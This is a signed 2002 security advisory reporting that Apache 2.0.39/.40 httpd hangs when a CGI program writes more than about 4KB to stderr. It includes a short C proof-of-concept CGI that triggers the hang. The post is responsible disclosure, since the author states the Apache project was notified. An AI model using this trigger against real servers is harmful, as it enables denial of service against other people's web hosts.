-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 - -=~=-_-=~=-_-=~=- I put PHP in the title so I know this message will reach the "sekur1ty c0mmun1ty", that *knows* that PHP is bad, because it's easy to write insecure applications, unlike C. - -=~=-_-=~=-_-=~=- Problem: o Apache 2.0 (.39 and .40 tested) on Linuxx0r (and possibly other OS's) will hang on a write to stderr that is larger than the default buffer size (4k on Linux) Impact: o Local users can cause apache's httpd process to hang o Possible new DoS to look for in web apps that write user input to stderr! Tested on: o Linux (RedHat) o FreeBSD (did not show a problem, but not well tested) Notification: o The Apache Projekt was contacted July 9th, 2002 (http://nagoya.apache.org/bugzilla/show_bug.cgi?id=10515) - -=~=-_-=~=-_-=~=- Sample Code - -=~=-_-=~=-_-=~=- // Credit to: K.C. Wong #include <stdio.h> #include <time.h> #include <unistd.h> #include <fcntl.h> #define SIZE 4075 void out_err() { char buffer[SIZE]; int i = 0; for (i = 0; i < SIZE - 1; ++i) buffer[i] = 'a' + (char )(i % 26); buffer[SIZE - 1] = '\0'; // fcntl(2, F_SETFL, fcntl(2, F_GETFL) | O_NONBLOCK); fprintf(stderr, "short test\n"); fflush(stderr); fprintf(stderr, "test error=%s\n", buffer); fflush(stderr); } // out_err() int main(int argc, char ** argv) { fprintf(stdout, "Context-Type: text/html\r\n"); fprintf(stdout, "\r\n\r\n"); out_err(); fprintf(stdout, "<HTML>\n"); fprintf(stdout, "<body>\n"); fprintf(stdout, "<h1>hello world</h1>\n"); fprintf(stdout, "</body>\n"); fprintf(stdout, "</HTML>\n"); fflush(stdout); exit(0); } // main() -----BEGIN PGP SIGNATURE----- Version: Hush 2.1 Note: This signature can be verified at https://www.hushtools.com wlgEARECABgFAj2Pa0MRHHNoYWRkdXBAaHVzaC5jb20ACgkQ8iAl114OGrxaHwCgsmGs 262aOmBHEUw01ktoAADRIz0AoJOdidtdbVswjjp0sqn1uHW+EQCT =8PKT -----END PGP SIGNATURE----- Get your free encrypted email at https://www.hushmail.com
